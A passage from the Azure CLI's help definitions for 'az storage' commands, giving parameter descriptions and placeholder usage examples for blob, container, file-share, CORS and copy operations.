long-summary: Specify this header to perform the operation only if the resource's ETag does not match the value specified. Specify the wildcard character (*) to perform the operation only if the resource does not exist, and fail the operation if it does exist.
examples:
- name: Delete all blobs ending with ".py" in a container that have not been modified for 10 days.
text: |
date=`date -d "10 days ago" '+%Y-%m-%dT%H:%MZ'`
az storage blob delete-batch -s mycontainer --account-name mystorageaccount --pattern *.py --if-unmodified-since $date --auth-mode login
- name: Delete all the blobs in a directory named "dir" in a container named "mycontainer".
text: |
az storage blob delete-batch -s mycontainer --pattern dir/*
- name: Delete the blobs with the format 'cli-2018-xx-xx.txt' or 'cli-2019-xx-xx.txt' in a container.
text: |
az storage blob delete-batch -s mycontainer --pattern cli-201[89]-??-??.txt
- name: Delete all blobs with the format 'cli-201x-xx-xx.txt' except cli-2018-xx-xx.txt' and 'cli-2019-xx-xx.txt' in a container.
text: |
az storage blob delete-batch -s mycontainer --pattern cli-201[!89]-??-??.txt
"""
helps['storage blob download-batch'] = """
type: command
short-summary: Download blobs from a blob container recursively.
parameters:
- name: --source -s
type: string
short-summary: The blob container from where the files will be downloaded.
long-summary: The source can be the container URL or the container name. When the source is the container URL, the storage account name will be parsed from the URL.
- name: --destination -d
type: string
short-summary: The existing destination folder for this download operation.
- name: --pattern
type: string
short-summary: The pattern used for globbing files or blobs in the source. The supported patterns are '*', '?', '[seq]', and '[!seq]'. For more information, please refer to https://docs.python.org/3.7/library/fnmatch.html.
long-summary: When you use '*' in --pattern, it will match any character including the the directory separator '/'.
- name: --dryrun
type: bool
short-summary: Show the summary of the operations to be taken instead of actually downloading the file(s).
examples:
- name: Download all blobs that end with .py
text: |
az storage blob download-batch -d . --pattern *.py -s mycontainer --account-name mystorageaccount --account-key 00000000
- name: Download all blobs in a directory named "dir" from container named "mycontainer".
text: |
az storage blob download-batch -d . -s mycontainer --pattern dir/*
- name: Download all blobs with the format 'cli-2018-xx-xx.txt' or 'cli-2019-xx-xx.txt' in container to current path.
text: |
az storage blob download-batch -d . -s mycontainer --pattern cli-201[89]-??-??.txt
- name: Download all blobs with the format 'cli-201x-xx-xx.txt' except cli-2018-xx-xx.txt' and 'cli-2019-xx-xx.txt' in container to current path.
text: |
az storage blob download-batch -d . -s mycontainer --pattern cli-201[!89]-??-??.txt
"""
helps['storage blob exists'] = """
type: command
short-summary: Check for the existence of a blob in a container.
parameters:
- name: --name -n
short-summary: The blob name.
examples:
- name: Check for the existence of a blob in a container. (autogenerated)
text: |
az storage blob exists --account-key 00000000 --account-name MyAccount --container-name MyContainer --name MyBlob
crafted: true
"""
helps['storage blob generate-sas'] = """
type: command
short-summary: Generate a shared access signature for the blob.
examples:
- name: Generate a sas token for a blob with read-only permissions.
text: |
end=`date -u -d "30 minutes" '+%Y-%m-%dT%H:%MZ'`
az storage blob generate-sas -c myycontainer -n MyBlob --permissions r --expiry $end --https-only
- name: Generate a sas token for a blob with ip range specified.
text: |
end=`date -u -d "30 minutes" '+%Y-%m-%dT%H:%MZ'`
az storage blob generate-sas -c myycontainer -n MyBlob --ip "176.134.171.0-176.134.171.255" --permissions r --expiry $end --https-only
- name: Generate a shared access signature for the blob. (autogenerated)
text: |
az storage blob generate-sas --account-key 00000000 --account-name MyStorageAccount --container-name MyContainer --expiry 2018-01-01T00:00:00Z --name MyBlob --permissions r
crafted: true
"""
helps['storage blob incremental-copy'] = """
type: group
short-summary: Manage blob incremental copy operations.
"""
helps['storage blob incremental-copy start'] = """
type: command
short-summary: Copies an incremental copy of a blob asynchronously.
long-summary: This operation returns a copy operation properties object, including a copy ID you can use to check or abort the copy operation. The Blob service copies blobs on a best-effort basis. The source blob for an incremental copy operation must be a page blob. Call get_blob_properties on the destination blob to check the status of the copy operation. The final blob will be committed when the copy completes.
parameters:
- name: --source-uri -u
short-summary: >
A URL of up to 2 KB in length that specifies an Azure page blob.
The value should be URL-encoded as it would appear in a request URI.
The copy source must be a snapshot and include a valid SAS token or be public.
Example:
`https://myaccount.blob.core.windows.net/mycontainer/myblob?snapshot=<DateTime>&sastoken`
examples:
- name: Upload all files that end with .py unless blob exists and has been modified since given date.
text: az storage blob incremental-copy start --source-container MySourceContainer --source-blob MyBlob --source-account-name MySourceAccount --source-account-key MySourceKey --source-snapshot MySnapshot --destination-container MyDestinationContainer --destination-blob MyDestinationBlob
- name: Copies an incremental copy of a blob asynchronously. (autogenerated)
text: |
az storage blob incremental-copy start --account-key 00000000 --account-name MyAccount --destination-blob MyDestinationBlob --destination-container MyDestinationContainer --source-account-key MySourceKey --source-account-name MySourceAccount --source-blob MyBlob --source-container MySourceContainer --source-snapshot MySnapshot
crafted: true
"""
helps['storage blob lease'] = """
type: group
short-summary: Manage storage blob leases.
"""
helps['storage blob lease acquire'] = """
type: command
short-summary: Request a new lease.
examples:
- name: Request a new lease.
text: az storage blob lease acquire -b myblob -c mycontainer --account-name mystorageaccount --account-key 0000-0000
"""
helps['storage blob lease renew'] = """
type: command
short-summary: Renew the lease.
examples:
- name: Renew the lease.
text: az storage blob lease renew -b myblob -c mycontainer --lease-id "32fe23cd-4779-4919-adb3-357e76c9b1bb" --account-name mystorageaccount --account-key 0000-0000
"""
helps['storage blob list'] = """
type: command
short-summary: List blobs in a given container.
parameters:
- name: --include
short-summary: 'Specifies additional datasets to include: (c)opy-info, (m)etadata, (s)napshots, (d)eleted-soft. Can be combined.'
examples:
- name: List all storage blobs in a container whose names start with 'foo'; will match names such as 'foo', 'foobar', and 'foo/bar'
text: az storage blob list -c MyContainer --prefix foo
"""
helps['storage blob metadata'] = """
type: group
short-summary: Manage blob metadata.
"""
helps['storage blob restore'] = """
type: command
short-summary: Restore blobs in the specified blob ranges.
examples:
- name: Restore blobs in two specified blob ranges. For examples, (container1/blob1, container2/blob2) and (container2/blob3..container2/blob4).
text: az storage blob restore --account-name mystorageaccount -g MyResourceGroup -t 2020-02-27T03:59:59Z -r container1/blob1 container2/blob2 -r container2/blob3 container2/blob4
- name: Restore blobs in the specified blob ranges from account start to account end.
text: az storage blob restore --account-name mystorageaccount -g MyResourceGroup -t 2020-02-27T03:59:59Z -r "" ""
- name: Restore blobs in the specified blob range.
text: |
time=`date -u -d "30 minutes" '+%Y-%m-%dT%H:%MZ'`
az storage blob restore --account-name mystorageaccount -g MyResourceGroup -t $time -r container0/blob1 container0/blob2
- name: Restore blobs in the specified blob range without wait and query blob restore status with 'az storage account show'.
text: |
time=`date -u -d "30 minutes" '+%Y-%m-%dT%H:%MZ'`
az storage blob restore --account-name mystorageaccount -g MyResourceGroup -t $time -r container0/blob1 container0/blob2 --no-wait
"""
helps['storage blob service-properties'] = """
type: group
short-summary: Manage storage blob service properties.
"""
helps['storage blob service-properties delete-policy'] = """
type: group
short-summary: Manage storage blob delete-policy service properties.
"""
helps['storage blob service-properties delete-policy show'] = """
type: command
short-summary: Show the storage blob delete-policy.
examples:
- name: Show the storage blob delete-policy. (autogenerated)
text: |
az storage blob service-properties delete-policy show --account-name mystorageccount --account-key 00000000
crafted: true
"""
helps['storage blob service-properties delete-policy update'] = """
type: command
short-summary: Update the storage blob delete-policy.
examples:
- name: Update the storage blob delete-policy. (autogenerated)
text: |
az storage blob service-properties delete-policy update --account-name mystorageccount --account-key 00000000 --days-retained 7 --enable true
crafted: true
"""
helps['storage blob service-properties update'] = """
type: command
short-summary: Update storage blob service properties.
examples:
- name: Update storage blob service properties. (autogenerated)
text: |
az storage blob service-properties update --404-document error.html --account-name mystorageccount --account-key 00000000 --index-document index.html --static-website true
crafted: true
"""
helps['storage blob set-tier'] = """
type: command
short-summary: Set the block or page tiers on the blob.
parameters:
- name: --type -t
short-summary: The blob type
- name: --tier
short-summary: The tier value to set the blob to.
- name: --timeout
short-summary: The timeout parameter is expressed in seconds. This method may make multiple calls to the Azure service and the timeout will apply to each call individually.
long-summary: >
For block blob this command only supports block blob on standard storage accounts.
For page blob, this command only supports for page blobs on premium accounts.
examples:
- name: Set the block or page tiers on the blob. (autogenerated)
text: |
az storage blob set-tier --account-key 00000000 --account-name MyAccount --container-name MyContainer --name MyBlob --tier P10
crafted: true
"""
helps['storage blob show'] = """
type: command
short-summary: Get the details of a blob.
examples:
- name: Show all properties of a blob.
text: az storage blob show -c MyContainer -n MyBlob
- name: Get the details of a blob (autogenerated)
text: |
az storage blob show --account-name mystorageccount --account-key 00000000 --container-name MyContainer --name MyBlob
crafted: true
"""
helps['storage blob sync'] = """
type: command
short-summary: Sync blobs recursively to a storage blob container.
examples:
- name: Sync a single blob to a container.
text: az storage blob sync -c mycontainer -s "path/to/file" -d NewBlob
- name: Sync a directory to a container.
text: az storage blob sync -c mycontainer --account-name mystorageccount --account-key 00000000 -s "path/to/directory"
"""
helps['storage blob upload'] = """
type: command
short-summary: Upload a file to a storage blob.
long-summary: Creates a new blob from a file path, or updates the content of an existing blob with automatic chunking and progress notifications.
parameters:
- name: --type -t
short-summary: Defaults to 'page' for *.vhd files, or 'block' otherwise.
- name: --maxsize-condition
short-summary: The max length in bytes permitted for an append blob.
- name: --validate-content
short-summary: Specifies that an MD5 hash shall be calculated for each chunk of the blob and verified by the service when the chunk has arrived.
- name: --tier
short-summary: A page blob tier value to set the blob to. The tier correlates to the size of the blob and number of allowed IOPS. This is only applicable to page blobs on premium storage accounts.
examples:
- name: Upload to a blob.
text: az storage blob upload -f /path/to/file -c MyContainer -n MyBlob
- name: Upload a file to a storage blob. (autogenerated)
text: |
az storage blob upload --account-name mystorageaccount --account-key 0000-0000 --container-name mycontainer --file /path/to/file --name myblob
crafted: true
"""
helps['storage blob upload-batch'] = """
type: command
short-summary: Upload files from a local directory to a blob container.
parameters:
- name: --source -s
type: string
short-summary: The directory where the files to be uploaded are located.
- name: --destination -d
type: string
short-summary: The blob container where the files will be uploaded.
long-summary: The destination can be the container URL or the container name. When the destination is the container URL, the storage account name will be parsed from the URL.
- name: --pattern
type: string
short-summary: The pattern used for globbing files or blobs in the source. The supported patterns are '*', '?', '[seq]', and '[!seq]'. For more information, please refer to https://docs.python.org/3.7/library/fnmatch.html.
long-summary: When you use '*' in --pattern, it will match any character including the the directory separator '/'.
- name: --dryrun
type: bool
short-summary: Show the summary of the operations to be taken instead of actually uploading the file(s).
- name: --if-match
type: string
short-summary: An ETag value, or the wildcard character (*). Specify this header to perform the operation only if the resource's ETag matches the value specified.
- name: --if-none-match
type: string
short-summary: An ETag value, or the wildcard character (*).
long-summary: Specify this header to perform the operation only if the resource's ETag does not match the value specified. Specify the wildcard character (*) to perform the operation only if the resource does not exist, and fail the operation if it does exist.
- name: --validate-content
short-summary: Specifies that an MD5 hash shall be calculated for each chunk of the blob and verified by the service when the chunk has arrived.
- name: --type -t
short-summary: Defaults to 'page' for *.vhd files, or 'block' otherwise. The setting will override blob types for every file.
- name: --maxsize-condition
short-summary: The max length in bytes permitted for an append blob.
- name: --lease-id
short-summary: The active lease id for the blob
examples:
- name: Upload all files that end with .py unless blob exists and has been modified since given date.
text: |
az storage blob upload-batch -d mycontainer --account-name mystorageaccount --account-key 00000000 -s <path-to-directory> --pattern *.py --if-unmodified-since 2018-08-27T20:51Z
- name: Upload all files from local path directory to a container named "mycontainer".
text: |
az storage blob upload-batch -d mycontainer -s <path-to-directory>
- name: Upload all files with the format 'cli-2018-xx-xx.txt' or 'cli-2019-xx-xx.txt' in local path directory.
text: |
az storage blob upload-batch -d mycontainer -s <path-to-directory> --pattern cli-201[89]-??-??.txt
- name: Upload all files with the format 'cli-201x-xx-xx.txt' except cli-2018-xx-xx.txt' and 'cli-2019-xx-xx.txt' in a container.
text: |
az storage blob upload-batch -d mycontainer -s <path-to-directory> --pattern cli-201[!89]-??-??.txt
"""
helps['storage blob url'] = """
type: command
short-summary: Create the url to access a blob.
examples:
- name: Create the url to access a blob (autogenerated)
text: |
az storage blob url --connection-string $connectionString --container-name container1 --name blob1
crafted: true
- name: Create the url to access a blob (autogenerated)
text: |
az storage blob url --account-name storageacct --account-key 00000000 --container-name container1 --name blob1
crafted: true
"""
helps['storage container'] = """
type: group
short-summary: Manage blob storage containers.
long-summary: >
Please specify one of the following authentication parameters for your commands: --auth-mode, --account-key,
--connection-string, --sas-token. You also can use corresponding environment variables to store your authentication
credentials, e.g. AZURE_STORAGE_KEY, AZURE_STORAGE_CONNECTION_STRING and AZURE_STORAGE_SAS_TOKEN.
"""
helps['storage container create'] = """
type: command
short-summary: Create a container in a storage account.
long-summary: >
By default, container data is private ("off") to the account owner. Use "blob" to allow public read access for blobs.
Use "container" to allow public read and list access to the entire container.
You can configure the --public-access using `az storage container set-permission -n CONTAINER_NAME --public-access blob/container/off`.
examples:
- name: Create a storage container in a storage account.
text: az storage container create -n MyStorageContainer
- name: Create a storage container in a storage account and return an error if the container already exists.
text: az storage container create -n MyStorageContainer --fail-on-exist
- name: Create a storage container in a storage account and allow public read access for blobs.
text: az storage container create -n MyStorageContainer --public-access blob
"""
helps['storage container delete'] = """
type: command
short-summary: Marks the specified container for deletion.
long-summary: >
The container and any blobs contained within it are later deleted during garbage collection.
examples:
- name: Marks the specified container for deletion. (autogenerated)
text: |
az storage container delete --account-key 00000000 --account-name MyAccount --name MyContainer
crafted: true
"""
helps['storage container exists'] = """
type: command
short-summary: Check for the existence of a storage container.
examples:
- name: Check for the existence of a storage container. (autogenerated)
text: |
az storage container exists --account-name mystorageccount --account-key 00000000 --name mycontainer
crafted: true
"""
helps['storage container generate-sas'] = """
type: command
short-summary: Generate a SAS token for a storage container.
examples:
- name: Generate a sas token for blob container and use it to upload a blob.
text: |
end=`date -u -d "30 minutes" '+%Y-%m-%dT%H:%MZ'`
sas=`az storage container generate-sas -n mycontainer --https-only --permissions dlrw --expiry $end -o tsv`
az storage blob upload -n MyBlob -c mycontainer -f file.txt --sas-token $sas
- name: Generate a shared access signature for the container (autogenerated)
text: |
az storage container generate-sas --account-key 00000000 --account-name mystorageaccount --expiry 2020-01-01 --name mycontainer --permissions dlrw
crafted: true
- name: Generate a SAS token for a storage container. (autogenerated)
text: |
az storage container generate-sas --account-name mystorageaccount --as-user --auth-mode login --expiry 2020-01-01 --name container1 --permissions dlrw
crafted: true
"""
helps['storage container immutability-policy'] = """
type: group
short-summary: Manage container immutability policies.
"""
helps['storage container lease'] = """
type: group
short-summary: Manage blob storage container leases.
"""
helps['storage container legal-hold'] = """
type: group
short-summary: Manage container legal holds.
"""
helps['storage container legal-hold show'] = """
type: command
short-summary: Get the legal hold properties of a container.
examples:
- name: Get the legal hold properties of a container. (autogenerated)
text: |
az storage container legal-hold show --account-name mystorageccount --container-name MyContainer
crafted: true
"""
helps['storage container list'] = """
type: command
short-summary: List containers in a storage account.
"""
helps['storage container metadata'] = """
type: group
short-summary: Manage container metadata.
"""
helps['storage container policy'] = """
type: group
short-summary: Manage container stored access policies.
"""
helps['storage copy'] = """
type: command
short-summary: Copy files or directories to or from Azure storage.
examples:
- name: Upload a single file to Azure Blob using url.
text: az storage copy -s /path/to/file.txt -d https://[account].blob.core.windows.net/[container]/[path/to/blob]
- name: Upload a single file to Azure Blob using account name and container name.
text: az storage copy --source-local-path /path/to/file.txt --destination-account-name mystorageaccount --destination-container mycontainer
- name: Upload a single file to Azure Blob with MD5 hash of the file content and save it as the blob's Content-MD5 property.
text: az storage copy -s /path/to/file.txt -d https://[account].blob.core.windows.net/[container]/[path/to/blob] --put-md5
- name: Upload an entire directory to Azure Blob using url.
text: az storage copy -s /path/to/dir -d https://[account].blob.core.windows.net/[container]/[path/to/directory] --recursive
- name: Upload an entire directory to Azure Blob using account name and container name.
text: az storage copy --source-local-path /path/to/dir --destination-account-name mystorageaccount --destination-container mycontainer --recursive
- name: Upload a set of files to Azure Blob using wildcards with url.
text: az storage copy -s /path/*foo/*bar/*.pdf -d https://[account].blob.core.windows.net/[container]/[path/to/directory]
- name: Upload a set of files to Azure Blob using wildcards with account name and container name.
text: az storage copy --source-local-path /path/*foo/*bar/*.pdf --destination-account-name mystorageaccount --destination-container mycontainer
- name: Upload files and directories to Azure Blob using wildcards with url.
text: az storage copy -s /path/*foo/*bar* -d https://[account].blob.core.windows.net/[container]/[path/to/directory] --recursive
- name: Upload files and directories to Azure Blob using wildcards with account name and container name.
text: az storage copy --source-local-path /path/*foo/*bar* --destination-account-name mystorageaccount --destination-container mycontainer --recursive
- name: Download a single file from Azure Blob using url, and you can also specify your storage account and container information as above.
text: az storage copy -s https://[account].blob.core.windows.net/[container]/[path/to/blob] -d /path/to/file.txt
- name: Download an entire directory from Azure Blob, and you can also specify your storage account and container information as above.
text: az storage copy -s https://[account].blob.core.windows.net/[container]/[path/to/directory] -d /path/to/dir --recursive
- name: Download a subset of containers within a storage account by using a wildcard symbol (*) in the container name, and you can also specify your storage account and container information as above.
text: az storage copy -s https://[account].blob.core.windows.net/[container*name] -d /path/to/dir --recursive
- name: Download a subset of files from Azure Blob. (Only jpg files and file names don't start with test will be included.)
text: az storage copy -s https://[account].blob.core.windows.net/[container] --include-pattern "*.jpg" --exclude-pattern test* -d /path/to/dir --recursive
- name: Copy a single blob to another blob, and you can also specify the storage account and container information of source and destination as above.
text: az storage copy -s https://[srcaccount].blob.core.windows.net/[container]/[path/to/blob] -d https://[destaccount].blob.core.windows.net/[container]/[path/to/blob]
- name: Copy an entire account data from blob account to another blob account, and you can also specify the storage account and container information of source and destination as above.
text: az storage copy -s https://[srcaccount].blob.core.windows.net -d https://[destaccount].blob.core.windows.net --recursive
- name: Copy a single object from S3 with access key to blob, and you can also specify your storage account and container information as above.
text: az storage copy -s https://s3.amazonaws.com/[bucket]/[object] -d https://[destaccount].blob.core.windows.net/[container]/[path/to/blob]
- name: Copy an entire directory from S3 with access key to blob virtual directory, and you can also specify your storage account and container information as above.
text: az storage copy -s https://s3.amazonaws.com/[bucket]/[folder] -d https://[destaccount].blob.core.windows.net/[container]/[path/to/directory] --recursive
- name: Copy all buckets in S3 service with access key to blob account, and you can also specify your storage account information as above.
text: az storage copy -s https://s3.amazonaws.com/ -d https://[destaccount].blob.core.windows.net --recursive
- name: Copy all buckets in a S3 region with access key to blob account, and you can also specify your storage account information as above.
text: az storage copy -s https://s3-[region].amazonaws.com/ -d https://[destaccount].blob.core.windows.net --recursive
- name: Upload a single file to Azure File Share using url.
text: az storage copy -s /path/to/file.txt -d https://[account].file.core.windows.net/[share]/[path/to/file]
- name: Upload a single file to Azure File Share using account name and share name.
text: az storage copy --source-local-path /path/to/file.txt --destination-account-name mystorageaccount --destination-share myshare
- name: Upload an entire directory to Azure File Share using url.
text: az storage copy -s /path/to/dir -d https://[account].file.core.windows.net/[share]/[path/to/directory] --recursive
- name: Upload an entire directory to Azure File Share using account name and container name.
text: az storage copy --source-local-path /path/to/dir --destination-account-name mystorageaccount --destination-share myshare --recursive
- name: Upload a set of files to Azure File Share using wildcards with account name and share name.
text: az storage copy --source-local-path /path/*foo/*bar/*.pdf --destination-account-name mystorageaccount --destination-share myshare
- name: Upload files and directories to Azure File Share using wildcards with url.
text: az storage copy -s /path/*foo/*bar* -d https://[account].file.core.windows.net/[share]/[path/to/directory] --recursive
- name: Upload files and directories to Azure File Share using wildcards with account name and share name.
text: az storage copy --source-local-path /path/*foo/*bar* --destination-account-name mystorageaccount --destination-share myshare --recursive
- name: Download a single file from Azure File Share using url, and you can also specify your storage account and share information as above.
text: az storage copy -s https://[account].file.core.windows.net/[share]/[path/to/file] -d /path/to/file.txt
- name: Download an entire directory from Azure File Share, and you can also specify your storage account and share information as above.
text: az storage copy -s https://[account].file.core.windows.net/[share]/[path/to/directory] -d /path/to/dir --recursive
- name: Download a set of files from Azure File Share using wildcards, and you can also specify your storage account and share information as above.
text: az storage copy -s https://[account].file.core.windows.net/[share]/ --include-pattern foo* -d /path/to/dir --recursive
"""
helps['storage cors'] = """
type: group
short-summary: Manage storage service Cross-Origin Resource Sharing (CORS).
"""
helps['storage cors add'] = """
type: command
short-summary: Add a CORS rule to a storage account.
parameters:
- name: --services
short-summary: >
The storage service(s) to add rules to. Allowed options are: (b)lob, (f)ile,
(q)ueue, (t)able. Can be combined.
- name: --max-age
short-summary: The maximum number of seconds the client/browser should cache a preflight response.
- name: --origins
short-summary: Space-separated list of origin domains that will be allowed via CORS, or '*' to allow all domains.
- name: --methods
short-summary: Space-separated list of HTTP methods allowed to be executed by the origin.
- name: --allowed-headers
short-summary: Space-separated list of response headers allowed to be part of the cross-origin request.
- name: --exposed-headers
short-summary: Space-separated list of response headers to expose to CORS clients.
"""
helps['storage cors clear'] = """
type: command
short-summary: Remove all CORS rules from a storage account.
parameters:
- name: --services
short-summary: >
The storage service(s) to remove rules from. Allowed options are: (b)lob, (f)ile,
(q)ueue, (t)able. Can be combined.
examples:
- name: Remove all CORS rules from a storage account. (autogenerated)
text: |
az storage cors clear --account-name MyAccount --services bfqt
crafted: true
"""
helps['storage cors list'] = """
type: command
short-summary: List all CORS rules for a storage account.
parameters:
- name: --services
short-summary: >
The storage service(s) to list rules for. Allowed options are: (b)lob, (f)ile,
(q)ueue, (t)able. Can be combined.
examples:
- name: List all CORS rules for a storage account. (autogenerated)
text: |
az storage cors list --account-key 00000000 --account-name mystorageaccount
crafted: true
"""
helps['storage directory'] = """
type: group
short-summary: Manage file storage directories.
"""
helps['storage directory exists'] = """
type: command
short-summary: Check for the existence of a storage directory.
examples:
- name: Check for the existence of a storage directory. (autogenerated)
text: |
az storage directory exists --account-key 00000000 --account-name MyAccount --name MyDirectory --share-name MyShare
crafted: true
"""
helps['storage directory list'] = """
type: command
short-summary: List directories in a share.
examples:
- name: List directories in a share. (autogenerated)
text: |
az storage directory list --account-key 00000000 --account-name MyAccount --share-name MyShare
crafted: true
"""
helps['storage directory metadata'] = """
type: group
short-summary: Manage file storage directory metadata.
"""
helps['storage entity'] = """
type: group
short-summary: Manage table storage entities.
"""
helps['storage entity insert'] = """
type: command
short-summary: Insert an entity into a table.
parameters:
- name: --table-name -t
type: string
short-summary: The name of the table to insert the entity into.
- name: --entity -e
type: list
short-summary: Space-separated list of key=value pairs. Must contain a PartitionKey and a RowKey.
long-summary: The PartitionKey and RowKey must be unique within the table, and may be up to 64Kb in size. If using an integer value as a key, convert it to a fixed-width string which can be canonically sorted. For example, convert the integer value 1 to the string value "0000001" to ensure proper sorting.
- name: --if-exists
type: string
short-summary: Behavior when an entity already exists for the specified PartitionKey and RowKey.
- name: --timeout
short-summary: The server timeout, expressed in seconds.
examples:
- name: Insert an entity into a table. (autogenerated)
text: |
az storage entity insert --connection-string $connectionString --entity PartitionKey=AAA RowKey=BBB Content=ASDF2 --if-exists fail --table-name MyTable
crafted: true
"""
helps['storage entity query'] = """
type: command
short-summary: List entities which satisfy a query.
parameters:
- name: --marker
type: list
short-summary: Space-separated list of key=value pairs. Must contain a nextpartitionkey and a nextrowkey.
long-summary: This value can be retrieved from the next_marker field of a previous generator object if max_results was specified and that generator has finished enumerating results. If specified, this generator will begin returning results from the point where the previous generator stopped.
examples:
- name: List entities which satisfy a query. (autogenerated)
text: |
az storage entity query --table-name MyTable
crafted: true
"""
helps['storage file'] = """
type: group
short-summary: Manage file shares that use the SMB 3.0 protocol.
"""
helps['storage file copy'] = """
type: group
short-summary: Manage file copy operations.
"""
helps['storage file copy start'] = """
type: command
short-summary: Copy a file asynchronously.
examples:
- name: Copy a file asynchronously.
text: |
az storage file copy start --source-account-name srcaccount --source-account-key 00000000 --source-path <srcpath-to-file> --source-share srcshare --destination-path <destpath-to-file> --destination-share destshare --account-name destaccount --account-key 00000000
- name: Copy a file asynchronously from source uri to destination storage account with sas token.
text: |
az storage file copy start --source-uri "https://srcaccount.file.core.windows.net/myshare/mydir/myfile?<sastoken>" --destination-path <destpath-to-file> --destination-share destshare --account-name destaccount --sas-token <destinaition-sas>
- name: Copy a file asynchronously from file snapshot to destination storage account with sas token.
text: |
az storage file copy start --source-account-name srcaccount --source-account-key 00000000 --source-path <srcpath-to-file> --source-share srcshare --file-snapshot "2020-03-02T13:51:54.0000000Z" --destination-path <destpath-to-file> --destination-share destshare --account-name destaccount --sas-token <destinaition-sas>
"""
helps['storage file copy start-batch'] = """
type: command
short-summary: Copy multiple files or blobs to a file share.
parameters:
- name: --destination-share
type: string
short-summary: The file share where the source data is copied to.
- name: --destination-path
type: string
short-summary: The directory where the source data is copied to. If omitted, data is copied to the root directory.
- name: --pattern
type: string
short-summary: The pattern used for globbing files and blobs. The supported patterns are '*', '?', '[seq]', and '[!seq]'. For more information, please refer to https://docs.python.org/3.7/library/fnmatch.html.
long-summary: When you use '*' in --pattern, it will match any character including the the directory separator '/'.
- name: --dryrun
type: bool
short-summary: List the files and blobs to be copied. No actual data transfer will occur.
- name: --source-account-name
type: string
short-summary: The source storage account to copy the data from. If omitted, the destination account is used.
- name: --source-account-key
type: string
short-summary: The account key for the source storage account. If omitted, the active login is used to determine the account key.
- name: --source-container
type: string
short-summary: The source container blobs are copied from.
- name: --source-share
type: string
short-summary: The source share files are copied from.
- name: --source-uri
type: string
short-summary: A URI that specifies a the source file share or blob container.
long-summary: If the source is in another account, the source must either be public or authenticated via a shared access signature.
- name: --source-sas
type: string
short-summary: The shared access signature for the source storage account.
examples:
- name: Copy all files in a file share to another storage account.
text: |
az storage file copy start-batch --source-account-name srcaccount --source-account-key 00000000 --source-share srcshare --destination-path <destpath-to-directory> --destination-share destshare --account-name destaccount --account-key 00000000
- name: Copy all files in a file share to another storage account. with sas token.
text: |
az storage file copy start-batch --source-uri "https://srcaccount.file.core.windows.net/myshare?<sastoken>" --destination-path <destpath-to-directory> --destination-share destshare --account-name destaccount --sas-token <destinaition-sas>
"""
helps['storage file delete-batch'] = """
type: command
short-summary: Delete files from an Azure Storage File Share.
parameters:
- name: --source -s
type: string
short-summary: The source of the file delete operation. The source can be the file share URL or the share name.
- name: --pattern
type: string
short-summary: The pattern used for file globbing. The supported patterns are '*', '?', '[seq]', and '[!seq]'. For more information, please refer to https://docs.python.org/3.7/library/fnmatch.html.
long-summary: When you use '*' in --pattern, it will match any character including the the directory separator '/'.
- name: --dryrun
type: bool
short-summary: List the files and blobs to be deleted. No actual data deletion will occur.
examples:
- name: Delete files from an Azure Storage File Share. (autogenerated)
text: |
az storage file delete-batch --account-key 00000000 --account-name MyAccount --source /path/to/file
crafted: true
- name: Delete files from an Azure Storage File Share. (autogenerated)
text: |
az storage file delete-batch --account-key 00000000 --account-name MyAccount --pattern *.py --source /path/to/file
crafted: true
"""
helps['storage file download-batch'] = """
type: command
short-summary: Download files from an Azure Storage File Share to a local directory in a batch operation.
parameters:
- name: --source -s
type: string
short-summary: The source of the file download operation. The source can be the file share URL or the share name.
- name: --destination -d
type: string
short-summary: The local directory where the files are downloaded to. This directory must already exist.
- name: --pattern
type: string
short-summary: The pattern used for file globbing. The supported patterns are '*', '?', '[seq]', and '[!seq]'. For more information, please refer to https://docs.python.org/3.7/library/fnmatch.html.
long-summary: When you use '*' in --pattern, it will match any character including the the directory separator '/'.
- name: --dryrun
type: bool
short-summary: List the files and blobs to be downloaded. No actual data transfer will occur.
- name: --max-connections
type: integer
short-summary: The maximum number of parallel connections to use. Default value is 1.
- name: --snapshot
type: string
short-summary: A string that represents the snapshot version, if applicable.
- name: --validate-content
type: bool
short-summary: If set, calculates an MD5 hash for each range of the file for validation.
long-summary: >
The storage service checks the hash of the content that has arrived is identical to the hash that was sent.
This is mostly valuable for detecting bitflips during transfer if using HTTP instead of HTTPS. This hash is not stored.
examples:
- name: Download files from an Azure Storage File Share to a local directory in a batch operation. (autogenerated)
text: |
az storage file download-batch --account-key 00000000 --account-name MyAccount --destination . --no-progress --source /path/to/file
crafted: true
"""
helps['storage file exists'] = """
type: command
short-summary: Check for the existence of a file.
examples:
- name: Check for the existence of a file. (autogenerated)
text: |
az storage file exists --account-key 00000000 --account-name MyAccount --path path/file.txt --share-name MyShare
crafted: true
- name: Check for the existence of a file. (autogenerated)
text: |
az storage file exists --connection-string $connectionString --path path/file.txt --share-name MyShare
crafted: true
"""
helps['storage file generate-sas'] = """
type: command
examples:
- name: Generate a sas token for a file.
text: |
end=`date -u -d "30 minutes" '+%Y-%m-%dT%H:%MZ'`
az storage file generate-sas -p path/file.txt -s MyShare --account-name MyStorageAccount --permissions rcdw --https-only --expiry $end
- name: Generate a shared access signature for the file. (autogenerated)
text: |
az storage file generate-sas --account-name MyStorageAccount --expiry 2037-12-31T23:59:00Z --path path/file.txt --permissions rcdw --share-name MyShare --start 2019-01-01T12:20Z
crafted: true
"""
helps['storage file list'] = """
type: command
short-summary: List files and directories in a share.
parameters:
- name: --exclude-dir
type: bool
short-summary: List only files in the given share.
examples:
- name: List files and directories in a share. (autogenerated)
text: |
az storage file list --share-name MyShare
crafted: true
"""
helps['storage file metadata'] = """
type: group
short-summary: Manage file metadata.
"""
helps['storage file upload'] = """
type: command
short-summary: Upload a file to a share that uses the SMB 3.0 protocol.
long-summary: Creates or updates an Azure file from a source path with automatic chunking and progress notifications.
examples:
- name: Upload to a local file to a share.
text: az storage file upload -s MyShare --source /path/to/file
- name: Upload a file to a share that uses the SMB 3.0 protocol. (autogenerated)
text: |
az storage file upload --account-key 00000000 --account-name MyStorageAccount --path path/file.txt --share-name MyShare --source /path/to/file
crafted: true
"""
helps['storage file upload-batch'] = """
type: command
short-summary: Upload files from a local directory to an Azure Storage File Share in a batch operation.
parameters:
- name: --source -s
type: string
short-summary: The directory to upload files from.
- name: --destination -d
type: string
short-summary: The destination of the upload operation.
long-summary: The destination can be the file share URL or the share name. When the destination is the share URL, the storage account name is parsed from the URL.
- name: --destination-path
type: string
short-summary: The directory where the source data is copied to. If omitted, data is copied to the root directory.
- name: --pattern
type: string
short-summary: The pattern used for file globbing. The supported patterns are '*', '?', '[seq]', and '[!seq]'. For more information, please refer to https://docs.python.org/3.7/library/fnmatch.html.
